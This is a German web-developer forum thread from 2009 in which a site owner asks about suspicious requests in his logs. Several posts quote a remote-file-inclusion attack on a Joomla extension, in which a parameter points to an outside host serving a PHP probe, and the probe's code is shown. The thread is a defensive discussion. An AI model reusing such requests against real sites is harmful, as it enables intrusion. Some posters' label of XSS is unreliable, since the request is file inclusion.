Raptor
Avatar Raptor
Themenersteller
IT-Student
Content Gott (1013 Beiträge)

Hack-Zugriff?

am 03.12.2009, 11:41 Uhr eröffnete Raptor folgenden Thread
Sonstige    2528 mal gelesen    7 Antwort(en).

Salut,

ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.)
Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?).
Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus.

Und wo wir schon bei unerklärlichen Zugriffen sind:
letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann.


Meine Developer-Website mit den Web-Entwickler-Tools.
Meine Web-Entwicklungs-Dienstleistungen

[url="http://www.seitenreport.de/forum/beitraege/seitenreport_verlosungen/wichtig_neue_regel

der_booker
Foren Moderator
selbständig
(2762 Beiträge)
am 03.12.2009, 11:44 Uhr schrieb der_booker

Hallo Flo, das kann mit dem Test "Alexa manipulieren" zusammen hängen. Dort verwende ich ja Proxy-Server.


Heiko Jendreck
personal helpdesk
http://www.phw-jendreck.de
http://www.seo-labor.com

hansen
Foren Moderator
Content Gott (1886 Beiträge)
am 03.12.2009, 11:53 Uhr schrieb hansen

Raptor schrieb:

Salut,

ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.)
Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?).
Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus.

Und wo wir schon bei unerklärlichen Zugriffen sind:
letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann.


Hallo Flo,

der erste Zugriff könnte doch auch von einer Bildersuche kommen (/images/), oder?

hansen


Nepal Rundreisen

Raptor
Avatar Raptor
IT-Student
Content Gott (1013 Beiträge)
am 03.12.2009, 12:03 Uhr schrieb Raptor

der_booker schrieb:

Hallo Flo, das kann mit dem Test "Alexa manipulieren" zusammen hängen. Dort verwende ich ja Proxy-Server.


Ich denke eher nicht, dass es damit einen Zusammenhang gibt. Warum sollte durch diesen Test eine solche Seite aufgerufen werden?
Es sieht mir mehr nach versuchtem XSS aus.
Unter der angegebenen Seite (ujcar.deva.rdsnet.ro/images/id1???) lässt sich folgenden Inhalt sehen:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

der_booker schrieb:

der erste Zugriff könnte doch auch von einer Bildersuche kommen (/images/), oder?


Ich weiss jetzt nicht worauf du hinaus willst. Ich denke nicht, dass es was mit einer Suche zu tun hat.
Die Log-Einträge sehen etwa so aus:

/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
/webscripting/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1?...
/webscripting/target-blank-in-xhtml-1-1/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar...

kein Referrer und mit Agent "Mozilla/5.0".


Meine Developer-Website mit den Web-Entwickler-Tools.
Meine Web-Entwicklungs-Dienstleistungen

[url="http://www.seitenreport.de/forum/beitraege/seitenreport_verlosungen/wichtig_neue_regel

romacron
JDev Xer
Content Gott (1224 Beiträge)
am 03.12.2009, 12:34 Uhr schrieb romacron

XSS , denke ich auch


Und wo wir schon bei unerklärlichen Zugriffen sind:
letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann.



Das zweite sieht nach einer Suchanfrage aus


seitenreport
Avatar seitenreport
Inhaber
TYPO3 Senior Developer
Content Gott (1772 Beiträge)
am 03.12.2009, 13:09 Uhr schrieb seitenreport

Raptor schrieb:

ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.)
Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?).
Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus..


Die mosConfig Zugriffe sind immer Angriffe auf vermeintliche Joomla Systeme (und oft erfolgreich).

Wenn eine recht neue Version von Joomla verwendet wird, besteht hier keine Gefahr. Ältere Versionen dagegen sind sehr anfällig (eine Freundin von mir traf es z.B. vor etwa 5 Monaten - der Angreifer erhielt über obige Methode einen kompletten Backend Zugriff).

Wenn kein Joomla verwendet wird, sind die Angriffe mehr oder weniger harmlos.

Gruß,
Matthias


SEO Analyse und Website-Check mit Seitenreport

Raptor
Avatar Raptor
IT-Student
Content Gott (1013 Beiträge)
am 03.12.2009, 13:38 Uhr schrieb Raptor

seitenreport schrieb:

Die mosConfig Zugriffe auf Joomla sind immer Angriffe (und oft erfolgreich). Wenn eine recht neue Version von Joomla verwendet wird, besteht hier keine Gefahr. Ältere Versionen dagegen sind sehr anfällig (eine Freundin von mir traf es z.B. vor etwa 5 Monaten - der Angreifer erhielt über obige Methode einen kompletten Backend Zugriff).


Wie kann ein CMS nur so unsicher sein...
Wobei, ArtRef ist doch eine Erweiterung?

seitenreport schrieb:

Welche Joomla Version verwendest Du?


Wie gesagt, ich benutze Joomla gar nicht. (Ich benutze überhaupt kein CMS.)
Irgendeine Folge (ausser 404 Not Found) hatten die Zugriffe deshalb auch nicht.


Meine Developer-Website mit den Web-Entwickler-Tools.
Meine Web-Entwicklungs-Dienstleistungen

[url="http://www.seitenreport.de/forum/beitraege/seitenreport_verlosungen/wichtig_neue_regel

romacron
JDev Xer
Content Gott (1224 Beiträge)
am 03.12.2009, 13:58 Uhr schrieb romacron

Ja, die Art-dings-bums ist ne Erweiterungs-Komponente. Wenn man alle server und php einstellungen richtig macht, kann da nichts per xss gemacht werden.

Das was am unsichersten ist, sind die Erweiterungen. Da werden kaum varieablen abgeklopft.



  • 1


« zurück zu: Sonstige

Das Seitenreport Forum hat aktuell 5274 Themen und 36108 Beiträge.
Insgesamt sind 48356 Mitglieder registriert.